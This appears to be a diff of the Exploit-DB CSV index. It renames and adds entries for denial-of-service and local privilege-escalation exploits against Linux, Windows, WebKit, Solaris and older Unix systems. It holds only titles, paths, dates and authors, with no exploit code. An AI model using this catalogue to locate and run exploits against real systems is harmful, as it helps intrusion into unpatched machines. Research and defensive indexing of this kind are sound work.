37865,platforms/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37866,platforms/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0 37867,platforms/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0 @@ -5194,7 +5198,7 @@ id,file,description,date,author,platform,type,port 40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Unpacking RAR Multiple Remote Memory Corruptions",2016-06-29,"Google Security Research",multiple,dos,0 40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40034,platforms/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0 -40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0 +40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - TNEF Decoder Integer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40036,platforms/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0 40037,platforms/multiple/dos/40037.txt,"Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0 @@ -5525,8 +5529,8 @@ id,file,description,date,author,platform,type,port 42048,platforms/linux/dos/42048.c,"Linux Kernel 4.11 - eBPF Verifier Log Leaks Lower Half of map Pointer",2017-05-22,"Google Security Research",linux,dos,0 42049,platforms/multiple/dos/42049.txt,"Apple iOS/macOS - Memory Corruption Due to Bad Bounds Checking in NSCharacterSet Coding for NSKeyedUnarchiver",2017-05-23,"Google Security Research",multiple,dos,0 42050,platforms/multiple/dos/42050.txt,"Apple iOS/macOS - NSUnarchiver Heap Corruption Due to Lack of Bounds Checking in [NSBuiltinCharacterSet initWithCoder:]",2017-05-23,"Google Security Research",multiple,dos,0 -42051,platforms/multiple/dos/42051.txt,"Apple iOS/macOS - NSKeyedArchiver Heap Corruption Due to Rounding Error in 'TIKeyboardLayout initWithCoder:'",2017-05-23,"Google Security Research",multiple,dos,0 -42052,platforms/multiple/dos/42052.txt,"Apple iOS/macOS - NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking in 'CAMediaTimingFunctionBuiltin'",2017-05-23,"Google Security Research",multiple,dos,0 +42051,platforms/multiple/dos/42051.txt,"Apple iOS/macOS - 'TIKeyboardLayout initWithCoder:' NSKeyedArchiver Heap Corruption Due to Rounding Error",2017-05-23,"Google Security Research",multiple,dos,0 +42052,platforms/multiple/dos/42052.txt,"Apple iOS/macOS - 'CAMediaTimingFunctionBuiltin' NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking",2017-05-23,"Google Security Research",multiple,dos,0 42054,platforms/multiple/dos/42054.c,"Apple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization",2017-05-23,"Google Security Research",multiple,dos,0 42055,platforms/multiple/dos/42055.c,"Apple iOS/macOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling",2017-05-23,"Google Security Research",multiple,dos,0 42056,platforms/macos/dos/42056.c,"Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization",2017-05-23,"Google Security Research",macos,dos,0 @@ -5659,8 +5663,8 @@ id,file,description,date,author,platform,type,port 42467,platforms/windows/dos/42467.html,"Microsoft Edge Chakra - NULL Pointer Dereference",2017-08-17,"Huang Anwen",windows,dos,0 42468,platforms/windows/dos/42468.html,"Microsoft Edge Chakra - Heap Buffer Overflow",2017-08-17,"Huang Anwen",windows,dos,0 42469,platforms/windows/dos/42469.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrectly Re-parses",2017-08-17,"Google Security Research",windows,dos,0 -42470,platforms/windows/dos/42470.html,"Microsoft Edge Chakra - Incorrect Usage of 'PushPopFrameHelper' in 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule'",2017-08-17,"Google Security Research",windows,dos,0 -42471,platforms/windows/dos/42471.html,"Microsoft Edge Chakra - Incorrect Usage of 'TryUndeleteProperty'",2017-08-17,"Google Security Research",windows,dos,0 +42470,platforms/windows/dos/42470.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service)",2017-08-17,"Google Security Research",windows,dos,0 +42471,platforms/windows/dos/42471.html,"Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service)",2017-08-17,"Google Security Research",windows,dos,0 42472,platforms/windows/dos/42472.html,"Microsoft Edge Chakra - 'EmitAssignment' uses the 'this' Register Without Initializing",2017-08-17,"Google Security Research",windows,dos,0 42473,platforms/windows/dos/42473.html,"Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2",2017-08-17,"Google Security Research",windows,dos,0 42474,platforms/windows/dos/42474.html,"Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion",2017-08-17,"Google Security Research",windows,dos,0 @@ -5684,8 +5688,8 @@ id,file,description,date,author,platform,type,port 42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 -42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath'",2017-09-18,"Google Security Research",windows,dos,0 -42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow'",2017-09-18,"Google Security Research",windows,dos,0 +42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' (Denial of Service)",2017-09-18,"Google Security Research",windows,dos,0 +42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' (Denial of Service)",2017-09-18,"Google Security Research",windows,dos,0 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0 @@ -5693,7 +5697,7 @@ id,file,description,date,author,platform,type,port 42762,platforms/linux/dos/42762.txt,"Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)",2017-09-21,"Marcin Kozlowski",linux,dos,0 42763,platforms/windows/dos/42763.html,"Microsoft Edge - Chakra Incorrectly Parses Object Patterns",2017-09-21,"Google Security Research",windows,dos,0 42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0 -42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0 +42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' Does Not Handle 'eval()' (Denial of Service)",2017-09-21,"Google Security Research",windows,dos,0 42766,platforms/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos,0 42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0 42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0 @@ -5715,12 +5719,12 @@ id,file,description,date,author,platform,type,port 42995,platforms/windows/dos/42995.txt,"Microsoft Excel - OLE Arbitrary Code Execution",2017-09-30,"Eduardo Braun Prado",windows,dos,0 42997,platforms/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",windows,dos,0 42998,platforms/windows/dos/42998.js,"Microsoft Edge Chakra JIT - Incorrect GenerateBailOut Calling Patterns",2017-10-17,"Google Security Research",windows,dos,0 -42999,platforms/windows/dos/42999.js,"Microsoft Edge Chakra - Accesses to Uninitialized Pointers in 'StackScriptFunction::BoxState::Box'",2017-10-17,"Google Security Research",windows,dos,0 +42999,platforms/windows/dos/42999.js,"Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service)",2017-10-17,"Google Security Research",windows,dos,0 43000,platforms/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",windows,dos,0 43001,platforms/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",windows,dos,0 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0 43107,platforms/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,"Juan Sacco",ios,dos,0 -43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0 +43014,platforms/linux/dos/43014.txt,"Xen - Pagetable De-typing Unbounded Recursion",2017-10-18,"Google Security Research",linux,dos,0 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0 43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0 43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0 @@ -5737,7 +5741,19 @@ id,file,description,date,author,platform,type,port 43152,platforms/windows/dos/43152.js,"Microsoft Edge Chakra JIT - Type Confusion with switch Statements",2017-11-16,"Google Security Research",windows,dos,0 43154,platforms/windows/dos/43154.js,"Microsoft Edge Chakra: JIT - 'OP_Memset' Type Confusion",2017-11-16,"Google Security Research",windows,dos,0 43161,platforms/ios/dos/43161.py,"iOS < 11.1 / tvOS < 11.1 / watchOS < 4.1 - Denial of Service",2017-11-20,"Russian Otter",ios,dos,0 +43164,platforms/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,hardware,dos,0 43165,platforms/windows/dos/43165.cpp,"Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure",2017-11-21,"Google Security Research",windows,dos,0 +43166,platforms/multiple/dos/43166.js,"WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43167,platforms/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43168,platforms/multiple/dos/43168.js,"WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43169,platforms/multiple/dos/43169.js,"WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43170,platforms/multiple/dos/43170.js,"WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos,0 +43171,platforms/multiple/dos/43171.js,"WebKit - 'WebCore::SimpleLineLayout::RunResolver::runForPoint' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos,0 +43172,platforms/multiple/dos/43172.js,"WebKit - 'WebCore::SVGPatternElement::collectPatternAttributes' Out-of-Bounds Read",2017-11-22,"Google Security Research",multiple,dos,0 +43173,platforms/multiple/dos/43173.html,"WebKit - 'WebCore::Style::TreeResolver::styleForElement' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43174,platforms/multiple/dos/43174.html,"WebKit - 'WebCore::DocumentLoader::frameLoader' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43175,platforms/multiple/dos/43175.html,"WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 +43176,platforms/multiple/dos/43176.html,"WebKit - 'WebCore::FormSubmission::create' Use-After-Free",2017-11-22,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5755,9 +5771,9 @@ id,file,description,date,author,platform,type,port 91,platforms/linux/local/91.c,"Stunnel 3.24/4.00 - Daemon Hijacking (PoC)",2003-09-05,"Steve Grubb",linux,local,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 104,platforms/linux/local/104.c,"hztty 2.0 (RedHat 9.0) - Privilege Escalation",2003-09-21,c0wboy,linux,local,0 -106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local",2003-09-27,"Juan Escriba",linux,local,0 +106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow",2003-09-27,"Juan Escriba",linux,local,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (SPARC) - 'ld.so.1' Buffer Overflow",2003-10-27,osker178,solaris,local,0 -118,platforms/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Local",2003-11-07,"Scott Bartram",bsd,local,0 +118,platforms/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Code Execution",2003-11-07,"Scott Bartram",bsd,local,0 120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Privilege Escalation",2003-11-13,Li0n7,linux,local,0 122,platforms/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,windows,local,0 125,platforms/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",bsd,local,0 @@ -5767,7 +5783,7 @@ id,file,description,date,author,platform,type,port 140,platforms/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game",2004-01-02,c0wboy,linux,local,0 141,platforms/linux/local/141.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 142,platforms/linux/local/142.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 -144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST Configuration Skribt Local",2004-01-15,l0om,linux,local,0 +144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files",2004-01-15,l0om,linux,local,0 145,platforms/linux/local/145.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",linux,local,0 152,platforms/linux/local/152.c,"rsync 2.5.7 - Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0 154,platforms/linux/local/154.c,"Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",linux,local,0 @@ -5783,13 +5799,13 @@ id,file,description,date,author,platform,type,port 197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",solaris,local,0 199,platforms/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,hp-ux,local,0 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 -202,platforms/bsd/local/202.c,"BSDi 3.0/4.0 - rcvtty[mh] Local",2000-11-21,vade79,bsd,local,0 +202,platforms/bsd/local/202.c,"BSDi 3.0/4.0 - 'rcvtty[mh]' Privilege Escalation",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0 205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0 206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Privilege Escalation",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 209,platforms/linux/local/209.c,"GLIBC - '/bin/su' Privilege Escalation",2000-11-30,localcore,linux,local,0 -210,platforms/solaris/local/210.c,"Solaris locale - Format Strings 'noexec stack'",2000-11-30,warning3,solaris,local,0 +210,platforms/solaris/local/210.c,"Solaris 2.6/7.0 - 'locale' Format Strings noexec stack Overflow",2000-11-30,warning3,solaris,local,0 215,platforms/linux/local/215.c,"GLIBC locale - bug mount",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386",2000-12-02,"Michel Kaempf",linux,local,0 217,platforms/linux/local/217.c,"UUCP - File Creation/Overwriting Symlinks",2000-12-04,t--zen,linux,local,0 @@ -5805,26 +5821,26 @@ id,file,description,date,author,platform,type,port 249,platforms/linux/local/249.c,"GLIBC locale - Format Strings",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7/8-beta - ARP Local Overflow",2001-01-15,ahmed,solaris,local,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Overflow",2001-01-15,teleh0r,linux,local,0 -255,platforms/linux/local/255.pl,"RedHat 6.1 man - 'egid 15' Local",2001-01-19,teleh0r,linux,local,0 +255,platforms/linux/local/255.pl,"RedHat 6.1 - 'man' Local Overflow / Privilege Escalation",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - 'su' Env Local Stack Overflow",2001-01-26,K2,tru64,local,0 -260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local",2001-01-26,"Michel Kaempf",linux,local,0 +260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Overflow",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,sco,local,0 -265,platforms/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local",2001-05-07,LSD-PLaNET,irix,local,0 -270,platforms/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local",2001-05-08,LSD-PLaNET,irix,local,0 +265,platforms/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation",2001-05-07,LSD-PLaNET,irix,local,0 +270,platforms/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Privilege Escalation",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZip - MIME Parsing Overflow (PoC)",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail - 'chpasswd' Buffer Overflow",2004-04-20,x314,linux,local,0 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local,0 -285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local",2001-03-03,kengz,linux,local,0 +285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Privilege Escalation",2001-03-03,kengz,linux,local,0 286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation",2001-03-03,dethy,bsd,local,0 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Privilege Escalation",2001-03-04,"the itch",multiple,local,0 -290,platforms/linux/local/290.tcsh,"GLIBC 2.1.3 - LD_PRELOAD Local",2001-03-04,Shadow,linux,local,0 +290,platforms/linux/local/290.tcsh,"GLIBC 2.1.3 - 'LD_PRELOAD' Privilege Escalation",2001-03-04,Shadow,linux,local,0 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0 -317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local",1996-01-01,"Jared Mauch",linux,local,0 +317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution",1996-01-01,"Jared Mauch",linux,local,0 319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0 320,platforms/linux/local/320.pl,"suid_perl 5.001 - Command Execution",1996-06-01,"Jon Lewis",linux,local,0 321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0 @@ -5832,7 +5848,7 @@ id,file,description,date,author,platform,type,port 325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink",1997-05-03,"Chris Sheldon",solaris,local,0 -331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Overflow *xterm",1997-05-14,"Ming Zhang",linux,local,0 +331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Local Overflow *xterm",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",solaris,local,0 333,platforms/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",aix,local,0 334,platforms/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,irix,local,0 @@ -5855,16 +5871,16 @@ id,file,description,date,author,platform,type,port 381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 -394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Overflow",2004-08-13,pi3,linux,local,0 -395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local",2004-08-14,mandragore,windows,local,0 -396,platforms/bsd/local/396.c,"OpenBSD - 'ftp'",2002-01-01,Teso,bsd,local,0 +394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow",2004-08-13,pi3,linux,local,0 +395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Overflow",2004-08-14,mandragore,windows,local,0 +396,platforms/bsd/local/396.c,"OpenBSD - 'ftp' Local Overflow",2002-01-01,Teso,bsd,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 -403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local",2004-08-18,anonymous,windows,local,0 +405,platforms/linux/local/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,local,0 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Privilege Escalation",2001-01-01,sd,linux,local,0 417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,linux,local,0 434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0 438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 -466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local",2004-09-16,"Luiz Fernando Camargo",linux,local,0 +466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Overflow",2004-09-16,"Luiz Fernando Camargo",linux,local,0 469,platforms/linux/local/469.c,"CDRecord's ReadCD - Privilege Escalation",2004-09-19,"Max Vozeler",linux,local,0 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",linux,local,0 476,platforms/linux/local/476.c,"glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow (PoC)",2004-09-23,CoKi,linux,local,0 @@ -5872,8 +5888,8 @@ id,file,description,date,author,platform,type,port 482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 - swxxx Privilege Escalation",2002-12-11,watercloud,hp-ux,local,0 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,windows,local,0 559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0 -560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local",2004-09-28,ATmaCA,windows,local,0 -579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local",2004-10-16,"Idan Nahoum",bsd,local,0 +560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local File Write",2004-09-28,ATmaCA,windows,local,0 +579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local acls Bypass",2004-10-16,"Idan Nahoum",bsd,local,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation",2004-10-20,Sha0,linux,local,0 587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0 591,platforms/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,linux,local,0 @@ -5898,8 +5914,9 @@ id,file,description,date,author,platform,type,port 739,platforms/bsd/local/739.c,"FreeBSD - '/usr/bin/top' Format String",2001-07-23,truefinder,bsd,local,0 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 -749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local",2005-01-11,"Cesar Cerrudo",windows,local,0 +749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Privilege Escalation",2005-01-11,"Cesar Cerrudo",windows,local,0 756,platforms/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local (PoC)",2005-01-15,"Rafael Carrasco",linux,local,0 